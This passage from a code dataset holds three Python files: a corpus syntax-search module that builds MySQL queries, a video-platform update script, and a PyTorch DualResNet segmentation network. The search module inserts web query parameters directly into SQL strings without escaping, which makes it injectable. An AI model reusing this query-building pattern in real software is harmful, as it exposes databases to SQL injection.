len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n # basic table correspondence conditions\n join_features = [\"words.%s = lexical_functions.%s\" % (words_feature, lf_feature) \\\n for (words_feature, lf_feature) in feature_matching]\n where.append(\" AND \".join(join_features))\n query += ' where %s' % ' AND '.join(where)\n return query\n\n def sql(self, con, prev):\n colums = [\"words.document\", \"words.sentence\"]\n tables 
= []\n where = []\n res = [[], \"temp%s\" % self.n, []]\n\n tmpname = None\n if prev != None:\n res[0] = prev[0]\n tmpname = prev[1]\n for el in res[0]:\n colums.append(\"%s.word%s AS word%s\" % (tmpname, el, el))\n if self.n in prev[0]:\n where.append(u\"words.word = %s.word%s\" % (tmpname, self.n))\n else:\n colums.append(\"words.word AS word%s\" % self.n)\n res[0].append(self.n)\n tables = [prev[1], \"words\"]\n where.append(u\"%s.document = words.document AND %s.sentence = words.sentence\" % (tmpname, tmpname))\n else:\n tables.append(\"words\")\n colums.append(\"words.word AS word%s\" % self.n)\n res[0] = [self.n]\n\n l = []\n for el in self.lexParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e.replace(\"-\", \"\")\n if e[0] == '\"':\n y.append(u\"words.form %s= '%s'\" % (neg, e.replace('\"', \"\")))\n else:\n y.append(u\"words.lex %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\"(%s)\" % \" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n l = ProduceCondition(\"gramms\", \"gramm\", self.grammParsed)\n if l:\n where.append(l)\n\n l = ProduceCondition(\"flags\", \"flags\", self.flagsParsed)\n if l:\n where.append(l)\n\n if self.linkExists:\n if self.father not in res[0]:\n colums.append(\"words.father AS word%s\" % self.father)\n res[0].append(self.father)\n where.append(u\"words.father IS NOT NULL\")\n else:\n where.append(u\"words.father = %s.word%s\" % (tmpname, self.father))\n\n l = []\n for el in self.linkParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n e = con.links.getId(e)\n if e != None:\n y.append(u\"words.link %s= '%s'\" % (neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n if self.lfExists:\n join_features = [\"words.%s = %s.%s\" % (feature, self.lfTable, feature) \\\n for feature in ['document', 'sentence', 'word']]\n where.append(\" AND \".join(join_features))\n if self.lfPrep:\n create_tmp = 'CREATE TEMPORARY TABLE %s (' % self.lfTable\n create_tmp += 'document INTEGER,'\n create_tmp += 'sentence INTEGER,'\n create_tmp += 'word SMALLINT,'\n create_tmp += 'lf_val SMALLINT,'\n create_tmp += 'lf_prep SMALLINT,'\n create_tmp += 'lf_func VARCHAR(32),'\n create_tmp += 'PRIMARY KEY (document, sentence, word, lf_val, lf_prep, lf_func))'\n create_tmp += ' ENGINE = MyISAM'\n self.create.append(create_tmp)\n self.query.append(self.formLfPrepQuery())\n tables.append(self.lfTable)\n if self.lfVal not in res[0]:\n colums.append(\"%s.lf_val AS word%s\" % (self.lfTable, self.lfVal))\n res[0].append(self.lfVal)\n elif tmpname:\n where.append(u\"%s.lf_val = %s.word%s\" % (self.lfTable, tmpname, self.lfVal))\n elif self.linkExists:\n where.append(u\"%s.lf_val = words.father\" % (self.lfTable))\n\n l = []\n for el in self.lfFuncParsed:\n y = []\n for e in el:\n neg = \"\"\n if e[0] == \"-\":\n neg = \"!\"\n e = e[1:]\n if e != None:\n y.append(u\"%s.lf_func %s= '%s'\" % (self.lfTable, neg, e))\n if len(y) > 0:\n l.append(\" AND \".join(y))\n if len(l) > 0:\n where.append(\"(%s)\" % \" OR \".join(l))\n\n # conditions on syntactic relation distance\n if self.linkExists:\n distances = self.makeDistances(self.father, tmpname, prev, 'syntax')\n if len(distances) > 1:\n where.extend(distances[0])\n res[2].extend(distances[1])\n # condition on lexical function relation distance\n if self.lfExists:\n distances = self.makeDistances(self.lfVal, tmpname, prev, 'lexical_function')\n if len(distances) > 1:\n 
where.extend(distances[0])\n res[2].extend(distances[1])\n\n if con.docid >= 0:\n where.append(u\"words.document = %s\" % (con.docid))\n\n if len(where) == 0:\n where.append(\"TRUE\")\n self.query.append(\"SELECT DISTINCT %s FROM %s WHERE %s\" % (\", \".join(colums), \", \".join(tables), \" AND \".join(where)))\n\n request = []\n request.append(\"CREATE TEMPORARY TABLE `%s` (\" % res[1])\n request.append(\"`document` INTEGER NOT NULL,\")\n request.append(\"`sentence` SMALLINT NOT NULL,\")\n t = [\"`document`\", \"`sentence`\"]\n for el in res[0]:\n request.append(\"`word%s` SMALLINT NOT NULL,\" % el)\n t.append(\"`word%s`\" % el)\n request.append(\"INDEX `KEY` (%s)\" % \", \".join(t))\n request.append(\") ENGINE = MEMORY\")\n\n self.create.append(\" \".join(request))\n\n res[0].sort()\n return res\n\n def makeDistances(self, in_from_element, in_tmpname, in_prev, in_relation):\n dists = []\n if self.minDist != None or self.maxDist != None:\n dists.append((self.n, in_from_element, self.minDist, self.maxDist))\n\n if in_prev != None:\n dists.extend(in_prev[2])\n\n if in_prev != None:\n dists = self.writeDist(in_tmpname, in_prev[0], dists, in_relation)\n else:\n dists = self.writeDist(in_tmpname, [], dists, in_relation)\n return dists\n\nclass Search:\n def __init__(self, query, db, out):\n self.db = db\n self.docid = -1\n self.stype = \"all-documents\"\n self.cursor = self.db.cursor()\n self.out = codecs.getwriter(\"utf8\")(out, 'xmlcharrefreplace')\n self.time = 0\n self.page = 0\n self.dpp = 10 # documents per page\n self.spd = 10 # snippets per document\n self.spp = 50 # snippets per page\n self.gramms = Attributes(self.cursor, \"gramms\")\n self.flags = Attributes(self.cursor, \"flags\")\n self.links = Attributes(self.cursor, \"links\")\n self.words = []\n self.query = []\n self.colums = None\n self.table = None\n self.doSearch = True\n self.writeWordInfo = False\n self.get_corpus_stats()\n\n self.docid = int(query.get(\"docid\", [-1])[0])\n if self.docid >= 0:\n self.stype = \"document\"\n self.page = int(query.get(\"ps\", [self.page])[0])\n else:\n self.page = int(query.get(\"p\", [self.page])[0])\n\n text = query.get(\"text\", [\"\"])[0]\n if text == \"word-info\":\n self.stype = \"word-info\"\n self.source = query.get(\"source\", [\"\"])[0]\n self.doSearch = False\n self.writeWordInfo = True\n elif text == 'document-info':\n self.doSearch = False\n self.stype = 'document-info'\n else:\n try:\n self.dpp = int(query.get(\"dpp\", [self.dpp])[0])\n self.spd = int(query.get(\"spd\", [self.spd])[0])\n self.spp = int(query.get(\"spp\", [self.spp])[0])\n except:\n pass\n\n if text == \"lexform\":\n tokens = query.get(\"req\", [\"\"])[0].replace(\"&\", \" \").replace(\"|\", \" \").replace(\",\", \" \").replace(\"(\", \" \").replace(\")\", \" \").replace(\"\\\"\", \" \").split()\n for index, token in enumerate(tokens):\n real_index = index + 1\n query[\"lex%s\" % real_index] = ['\"%s\"' % token]\n if real_index > 1:\n query[\"min%s\" % real_index] = [\"1\"]\n query[\"max%s\" % real_index] = [\"1\"]\n query[\"parent%s\" % real_index] = [real_index - 1]\n\n while \"lex%s\" % (len(self.words) + 1) in query:\n self.words.append(Word(query, len(self.words)))\n\n def get_corpus_stats(self):\n self.cursor.execute(\"SELECT documents_number, sentences_number, words_number FROM corpus_stats;\")\n self.total_documents, self.total_sentences, self.total_words = self.cursor.fetchall()[0]\n\n def request(self):\n self.query = [x for x in self.words if not x.empty()]\n self.query.sort(cmp=lambda x,y: 
cmp(x.value(), y.value()), reverse=True)\n\n table = None\n for el in self.query:\n table = el.sql(self, table)\n self.colums = table[0]\n self.table = table[1]\n\n def hit(self):\n self.time = 0\n begin = time.time()\n last = begin\n prev = None\n for el in self.query:\n if self.time > max_time:\n raise Exception\n if not el.empty():\n assert len(el.create) == len(el.query)\n for (create_clause, query_clause) in zip(el.create, el.query):\n self.cursor.execute(\"%s %s\" % (create_clause, query_clause))\n self.time += time.time() - last\n last = time.time()\n if prev != None:\n self.cursor.execute(\"DROP TABLE IF EXISTS temp%s;\" % (prev))\n prev = el.n\n\n def writeAnaEl(self, name, vals):\n self.out.write('' % name)\n self.out.write(\"\")\n for el in vals:\n self.out.write(\"%s \" % _quoteattr(el))\n self.out.write(\" \")\n self.out.write(\" \")\n\n def writeWord(self, lex, gramm, text, target = False):\n if text != None:\n source = \"|\".join((lex, str(gramm), text))\n source = urllib.quote(codecs.getencoder(\"utf8\")(source)[0])\n self.out.write('\")\n if self.writeWordInfo:\n self.out.write(\"\")\n self.writeAnaEl(\"lex\", [lex])\n self.writeAnaEl(\"gramm\", self.gramms.getValue(gramm))\n self.out.write(\" \")\n self.out.write(\" \")\n\n def searchResult(self):\n self.cursor.execute(\"SELECT DISTINCT COUNT(DISTINCT document), COUNT(DISTINCT document, sentence), COUNT(*) FROM `%s`;\" % self.table)\n res = self.cursor.fetchall()\n documentCount = res[0][0]\n sentenceCount = res[0][1]\n hitCount = res[0][2]\n\n self.out.write('' % (documentCount, sentenceCount, hitCount, _quoteattr(self.stype)))\n \n self.out.write(' ' % (self.total_documents, self.total_sentences, self.total_words))\n\n pmin = self.page * self.dpp\n pmax = self.dpp\n if self.stype == \"document\":\n pmin = 0\n pmax = 1\n\n self.cursor.execute(\n \"SELECT DISTINCT document, url, title, image, COUNT(DISTINCT sentence) FROM `%s`, `documents` WHERE %s.document = documents.id GROUP BY document LIMIT %s, %s\" %\n (self.table, self.table, pmin, pmax))\n\n docs = self.cursor.fetchall()\n\n if len(docs) > 2:\n self.cursor.execute(\"DELETE FROM `%s` WHERE document < %s OR document > %s;\" % (self.table, docs[0][0], docs[-1][0]))\n\n for (document, url, title, image, snippets) in docs:\n self.out.write('' % (document, _quoteattr(url), _quoteattr(title), snippets))\n\n pmin = 0\n pmax = self.spd\n if self.stype == \"document\":\n pmin = self.page * self.spp\n pmax = self.spp\n\n self.cursor.execute(\"SELECT DISTINCT sentence FROM %s WHERE %s.document = %s LIMIT %s, %s\" % (self.table, self.table, document, pmin, pmax))\n\n sentences = self.cursor.fetchall()\n if len(sentences) > 2:\n self.cursor.execute(\"DELETE FROM `%s` WHERE document = %s AND (sentence < %s OR sentence > %s);\" % (self.table, document, sentences[0][0], sentences[-1][0]))\n\n for (sentence,) in sentences:\n self.out.write(\"\" % (sentence, _quoteattr(image), sentence))\n\n tar = []\n for el in self.colums:\n tar.append(\"%s.word%s = words.word\" % (self.table, el))\n tar = \"SELECT * FROM %s WHERE %s.document = %s AND %s.sentence = %s AND (%s)\" % (self.table, self.table, document, self.table, sentence, \" OR \".join(tar))\n self.cursor.execute(\"SELECT lex, gramm, trash, text, EXISTS(%s) FROM words WHERE document = %s AND sentence = %s\" % (tar, document, sentence))\n\n for (lex, gramm, trash, text, target) in self.cursor.fetchall():\n self.out.write(\"%s \" % _quotetext(trash))\n self.writeWord(lex, gramm, text, target)\n self.out.write(\" \")\n 
self.out.write(\" \")\n self.out.write(\" \")\n\n def writeDocumentInfo(self, in_docid):\n self.cursor.execute(\"SELECT title, url FROM documents WHERE id = %s\" % in_docid)\n docs = self.cursor.fetchall()\n\n assert len(docs) == 1\n (title, url) = docs[0]\n self.out.write('' % (in_docid, _quoteattr(url), _quoteattr(title)))\n self.out.write('')\n self.out.write(' ' % _quoteattr(title))\n self.out.write(' ')\n self.out.write(' ')\n\n\n def result(self):\n if self.doSearch:\n self.searchResult()\n else:\n self.out.write(\"\")\n if self.stype == 'document-info':\n self.writeDocumentInfo(self.docid)\n else:\n query = self.source.split(\"|\")\n if len(query) > 2:\n self.writeWord(query[0], int(query[1]), query[2])\n self.out.write(\" \")\n\n def execute(self):\n self.out.write(u\"\")\n\n if self.doSearch:\n self.request()\n self.hit()\n self.out.write(u'' % self.page)\n self.out.write(u'' % (self.dpp, self.spd, self.spp))\n self.out.write(u'')\n for el in self.words:\n self.out.write(el.xml())\n self.out.write(u\" \")\n self.out.write(u'')\n for el in self.query:\n self.out.write(el.xml(True))\n self.out.write(u' ')\n self.out.write(u\" \")\n\n times = time.time()\n self.result()\n self.out.write(u'' % (self.time, time.time() - times))\n\n self.out.write(u\"\")\n","sub_path":"search/syntax/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":25050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
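The search module above is Python 2 (`u''` literals, `sort(cmp=...)`, a bare `except`). A minimal sketch of how the query-ordering call in `Search.request` translates to Python 3, where the `cmp` argument was removed in favor of a key function; `Word.value()` and `Word.empty()` are the methods already used in the record:

self.query = [x for x in self.words if not x.empty()]
# Sort descending by each word's selectivity score instead of a cmp callback.
self.query.sort(key=lambda word: word.value(), reverse=True)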
+{"seq_id":"310771154","text":"# -*- encoding=utf-8 -*-\nimport paras\nimport random, time\nfrom video_APP import bobotv, bestv\n\n\nbobo = bobotv(paras.urls_boboTV,paras.headers_boboTV,paras.paras_boboTV)\n# print(bobo.search('极限挑战','综艺'))\n# print(bobo.update_head())\n# print(bobo.update_video('http://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001331.json'))\n\n# vid_bst=['2970859','2967763','2974938']\nbest = bestv(paras.urls_bestv,paras.headers_bestv,paras.paras_bestv)\n# print(be.update_head())\n# print(be.search('魔都风云'))\n# print(be.update_video('2970859'))\n\n'''\nah = iTV(paras.urls_iTV,paras.headers_iTV,paras.paras_iTV)\n# print(ah.search('如果'))\n# print(ah.update_video('Vstartek205943','3'))\n# print(ah.update_head())\n# print(ah.update_token())\n\nuhd = UHD(paras.urls_UHD,paras.headers_UHD,paras.paras_UHD)\n# print(uhd.search('如果'))\n# print(uhd.update_head())\n# print(uhd.update_video('524','4'))\n\nhn = HuNan_TV(paras.urls_HuNanTV,paras.headers_HuNanTV,paras.paras_HuNanTV)\n# print(hn.search('人民'))\n# print(hn.update_video('24B16FEDE9A67C9251D3E7C7161C83AC'))\n# print(hn.update_head())\n\n\n\niTV_video = {'obj':ah,'list':{'梅花儿香':['Vstartek285969','3'],'婚姻遇险记':['Vstartek285184','3']}}\n\nhn_video = {'obj':hn,'list':{'梅花儿香':'Attr_E7AE9DD3036717895F9944A5B9346A68',\n '婚姻遇险记':'Attr_11C0A1255A042376FAA36A9ABCD1A727',\n '非常静距离':'Merge_E00DA03B685A0DD18FB6A08AF0923DE0',\n '非你莫属':'Merge_F718499C1C8CEF6730F9FD03C8125CAB'}}\n\n\nuhd_video = {'obj':uhd,'list':{'梅花儿香':['Umai:SERI/4093400@BESTV.SMG.SMG','3'],\n '婚姻遇险记':['Umai:SERI/4085907@BESTV.SMG.SMG','3'],\n '金牌调解':['1902','9'],\n '非你莫属':['12118','10'],\n '非常完美':['8609','4'],}}\n'''\nbobo_video = {'obj':bobo,'list':{'梅花儿香':'https://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001455.json',\n '婚姻遇险记':'https://epg.bobo.itvsh.cn/epg/api/series/00000001000000100000000000001453.json',\n '非常静距离':'https://epg.bobo.itvsh.cn/epg/api/album/album_19.json'}}\n\nbest_video = {'obj':best,'list':{'梅花儿香':'3170127'}}\n\n\n\nlists = [bobo_video, best_video]\n\n\nresult = ''\nfor li in lists:\n for k,v in li['list'].items():\n if isinstance(v,str):\n time.sleep(random.uniform(4, 6))\n print(k, '&', li['obj'].update_video(v))\n result += k+'&'+li['obj'].update_video(v)+'\\n'\n else:\n pass\n # time.sleep(random.uniform(4, 6))\n # print(k, '&', li['obj'].update_video(v[0],v[1]))\n # result += k + '&' +li['obj'].update_video(v[0],v[1])+'\\n'\n\nf = open('video_update.txt', 'a')\nf.write(result)\nf.close()\n","sub_path":"Proj_App/VideoSite/update_video.py","file_name":"update_video.py","file_ext":"py","file_size_in_byte":2910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
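In the update loop above, `li['obj'].update_video(v)` is called twice per title (once for the `print`, once for the result string), so every video is updated over the network twice. A sketch of a single-call variant with per-item error handling, so one failed request does not abort the batch (the exception type caught is an assumption; `lists` is the structure from the record):

import random, time

def safe_update(site, video_ref):
    # One network call per title; return an error marker instead of raising.
    time.sleep(random.uniform(4, 6))  # keep the polite delay from the original
    try:
        return site.update_video(video_ref)
    except Exception as exc:  # assumption: request/parse errors surface here
        return 'ERROR: %s' % exc

result = ''
for li in lists:
    for k, v in li['list'].items():
        if isinstance(v, str):
            info = safe_update(li['obj'], v)
            print(k, '&', info)
            result += k + '&' + info + '\n'

with open('video_update.txt', 'a') as f:  # context manager closes on error too
    f.write(result)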
+{"seq_id":"475487664","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nBatchNorm2d = nn.BatchNorm2d\nbn_mom = 0.1\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass ConvBnAct(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1,\n bias=False, apply_act=True):\n super(ConvBnAct, self).__init__()\n self.conv=nn.Conv2d(in_channels,out_channels,kernel_size,stride,padding,dilation,groups,bias)\n self.bn=nn.BatchNorm2d(out_channels)\n if apply_act:\n self.act=nn.ReLU(inplace=True)\n else:\n self.act=None\n def forward(self, x):\n x = self.conv(x)\n x = self.bn(x)\n if self.act is not None:\n x=self.act(x)\n return x\n\nclass BnActConv(nn.Module):\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1, padding=0, dilation=1, groups=1,\n bias=False):\n super(BnActConv, self).__init__()\n self.bn=nn.BatchNorm2d(in_channels)\n self.act=nn.ReLU(inplace=True)\n self.conv=nn.Conv2d(in_channels,out_channels,kernel_size,stride,padding,dilation,groups,bias)\n def forward(self, x):\n x = self.bn(x)\n x=self.act(x)\n x = self.conv(x)\n return x\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, no_relu=False):\n super(BasicBlock, self).__init__()\n self.conv1 = conv3x3(inplanes, planes, stride)\n self.bn1 = BatchNorm2d(planes, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(planes, planes)\n self.bn2 = BatchNorm2d(planes, momentum=bn_mom)\n self.downsample = downsample\n self.stride = stride\n self.no_relu = no_relu\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n\n if self.no_relu:\n return out\n else:\n return self.relu(out)\n\nclass Bottleneck(nn.Module):\n expansion = 2\n\n def __init__(self, inplanes, planes, stride=1, downsample=None, no_relu=True):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = BatchNorm2d(planes, momentum=bn_mom)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = BatchNorm2d(planes, momentum=bn_mom)\n self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,\n bias=False)\n self.bn3 = BatchNorm2d(planes * self.expansion, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n self.no_relu = no_relu\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n if self.no_relu:\n return out\n else:\n return self.relu(out)\n\nclass DAPPM(nn.Module):\n def __init__(self, inplanes, branch_planes, outplanes):\n super(DAPPM, self).__init__()\n # self.scale1 = nn.Sequential(nn.AvgPool2d(kernel_size=5, stride=2, padding=2),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale1=nn.Sequential(\n 
nn.AvgPool2d(kernel_size=5, stride=2, padding=2),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale2 = nn.Sequential(nn.AvgPool2d(kernel_size=9, stride=4, padding=4),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale2=nn.Sequential(\n nn.AvgPool2d(kernel_size=9, stride=4, padding=4),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale3 = nn.Sequential(nn.AvgPool2d(kernel_size=17, stride=8, padding=8),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale3=nn.Sequential(\n nn.AvgPool2d(kernel_size=17, stride=8, padding=8),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale4 = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale4=nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n BnActConv(inplanes,branch_planes)\n )\n # self.scale0 = nn.Sequential(\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, branch_planes, kernel_size=1, bias=False),\n # )\n self.scale0=BnActConv(inplanes,branch_planes)\n # self.process1 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process1=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process2 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process2=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process3 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process3=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.process4 = nn.Sequential(\n # BatchNorm2d(branch_planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes, branch_planes, kernel_size=3, padding=1, bias=False),\n # )\n self.process4=BnActConv(branch_planes,branch_planes,3,padding=1)\n # self.compression = nn.Sequential(\n # BatchNorm2d(branch_planes * 5, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(branch_planes * 5, outplanes, kernel_size=1, bias=False),\n # )\n self.compression=BnActConv(branch_planes * 5,outplanes,1)\n # self.shortcut = nn.Sequential(\n # BatchNorm2d(inplanes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(inplanes, outplanes, kernel_size=1, bias=False),\n # )\n self.shortcut=BnActConv(inplanes,outplanes,1)\n\n def forward(self, x):\n\n #x = self.downsample(x)\n width = x.shape[-1]\n height = x.shape[-2]\n x_list = []\n\n x_list.append(self.scale0(x))\n x_list.append(self.process1((F.interpolate(self.scale1(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[0])))\n x_list.append((self.process2((F.interpolate(self.scale2(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[1]))))\n x_list.append(self.process3((F.interpolate(self.scale3(x),\n size=[height, width],\n mode='bilinear',\n align_corners=False)+x_list[2])))\n x_list.append(self.process4((F.interpolate(self.scale4(x),\n size=[height, width],\n mode='bilinear',\n 
align_corners=False)+x_list[3])))\n\n out = self.compression(torch.cat(x_list, 1)) + self.shortcut(x)\n return out\n\n\nclass segmenthead(nn.Module):\n\n def __init__(self, inplanes, interplanes, outplanes):\n super(segmenthead, self).__init__()\n self.bn1 = BatchNorm2d(inplanes, momentum=bn_mom)\n self.conv1 = nn.Conv2d(inplanes, interplanes, kernel_size=3, padding=1, bias=False)\n self.bn2 = BatchNorm2d(interplanes, momentum=bn_mom)\n self.relu = nn.ReLU(inplace=True)\n self.conv2 = nn.Conv2d(interplanes, outplanes, kernel_size=1, padding=0, bias=True)\n # self.scale_factor = scale_factor\n\n def forward(self, x):\n\n x = self.conv1(self.relu(self.bn1(x)))\n out = self.conv2(self.relu(self.bn2(x)))\n #\n # if self.scale_factor is not None:\n # height = x.shape[-2] * self.scale_factor\n # width = x.shape[-1] * self.scale_factor\n # out = F.interpolate(out,\n # size=[height, width],\n # mode='bilinear')\n\n return out\n\nclass DualResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=19, planes=64, spp_planes=128, head_planes=128, augment=False):\n super(DualResNet, self).__init__()\n\n highres_planes = planes * 2\n self.augment = augment\n\n # self.conv1 = nn.Sequential(\n # nn.Conv2d(3,planes,kernel_size=3, stride=2, padding=1),\n # BatchNorm2d(planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(planes,planes,kernel_size=3, stride=2, padding=1),\n # BatchNorm2d(planes, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # )\n self.conv1=nn.Sequential(\n ConvBnAct(3,planes,3,2,1),\n ConvBnAct(planes,planes,3,2,1),\n )\n\n self.relu = nn.ReLU(inplace=False)\n self.layer1 = self._make_layer(block, planes, planes, layers[0])\n self.layer2 = self._make_layer(block, planes, planes * 2, layers[1], stride=2)\n self.layer3 = self._make_layer(block, planes * 2, planes * 4, layers[2], stride=2)\n self.layer4 = self._make_layer(block, planes * 4, planes * 8, layers[3], stride=2)\n\n # self.compression3 = nn.Sequential(\n # nn.Conv2d(planes * 4, highres_planes, kernel_size=1, bias=False),\n # BatchNorm2d(highres_planes, momentum=bn_mom),\n # )\n self.compression3=ConvBnAct(planes*4,highres_planes,apply_act=False)\n\n # self.compression4 = nn.Sequential(\n # nn.Conv2d(planes * 8, highres_planes, kernel_size=1, bias=False),\n # BatchNorm2d(highres_planes, momentum=bn_mom),\n # )\n self.compression4=ConvBnAct(planes * 8, highres_planes,apply_act=False)\n\n # self.down3 = nn.Sequential(\n # nn.Conv2d(highres_planes, planes * 4, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 4, momentum=bn_mom),\n # )\n self.down3=ConvBnAct(highres_planes, planes * 4,3,2,1,apply_act=False)\n\n # self.down4 = nn.Sequential(\n # nn.Conv2d(highres_planes, planes * 4, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 4, momentum=bn_mom),\n # nn.ReLU(inplace=True),\n # nn.Conv2d(planes * 4, planes * 8, kernel_size=3, stride=2, padding=1, bias=False),\n # BatchNorm2d(planes * 8, momentum=bn_mom),\n # )\n self.down4=nn.Sequential(\n ConvBnAct(highres_planes, planes * 4,3,2,1),\n ConvBnAct(planes * 4, planes * 8,3,2,1,apply_act=False)\n )\n\n self.layer3_ = self._make_layer(block, planes * 2, highres_planes, 2)\n\n self.layer4_ = self._make_layer(block, highres_planes, highres_planes, 2)\n\n self.layer5_ = self._make_layer(Bottleneck, highres_planes, highres_planes, 1)\n\n self.layer5 = self._make_layer(Bottleneck, planes * 8, planes * 8, 1, stride=2)\n\n self.spp = DAPPM(planes * 16, spp_planes, planes * 4)\n\n if self.augment:\n self.seghead_extra = 
segmenthead(highres_planes, head_planes, num_classes)\n\n self.final_layer = segmenthead(planes * 4, head_planes, num_classes)\n\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\n def _make_layer(self, block, inplanes, planes, blocks, stride=1):\n downsample = None\n if stride != 1 or inplanes != planes * block.expansion:\n # downsample = nn.Sequential(\n # nn.Conv2d(inplanes, planes * block.expansion,\n # kernel_size=1, stride=stride, bias=False),\n # nn.BatchNorm2d(planes * block.expansion, momentum=bn_mom),\n # )\n downsample=ConvBnAct(inplanes, planes * block.expansion,stride=stride,apply_act=False)\n\n layers = []\n layers.append(block(inplanes, planes, stride, downsample))\n inplanes = planes * block.expansion\n for i in range(1, blocks):\n if i == (blocks-1):\n layers.append(block(inplanes, planes, stride=1, no_relu=True))\n else:\n layers.append(block(inplanes, planes, stride=1, no_relu=False))\n\n return nn.Sequential(*layers)\n\n\n def forward(self, x):\n original_size=x.shape[-2:]\n width_output = x.shape[-1] // 8\n height_output = x.shape[-2] // 8\n layers = []\n\n x = self.conv1(x)\n\n x = self.layer1(x)\n layers.append(x)\n\n x = self.layer2(self.relu(x))\n layers.append(x)\n\n x = self.layer3(self.relu(x))\n layers.append(x)\n x_ = self.layer3_(self.relu(layers[1]))\n\n x = x + self.down3(self.relu(x_))\n x_ = x_ + F.interpolate(\n self.compression3(self.relu(layers[2])),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n if self.augment:\n temp = x_\n\n x = self.layer4(self.relu(x))\n layers.append(x)\n x_ = self.layer4_(self.relu(x_))\n\n x = x + self.down4(self.relu(x_))\n x_ = x_ + F.interpolate(\n self.compression4(self.relu(layers[3])),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n\n x_ = self.layer5_(self.relu(x_))\n x = F.interpolate(\n self.spp(self.layer5(self.relu(x))),\n size=[height_output, width_output],\n mode='bilinear',align_corners=False)\n\n x_ = self.final_layer(x + x_)\n\n x_=F.interpolate(x_, 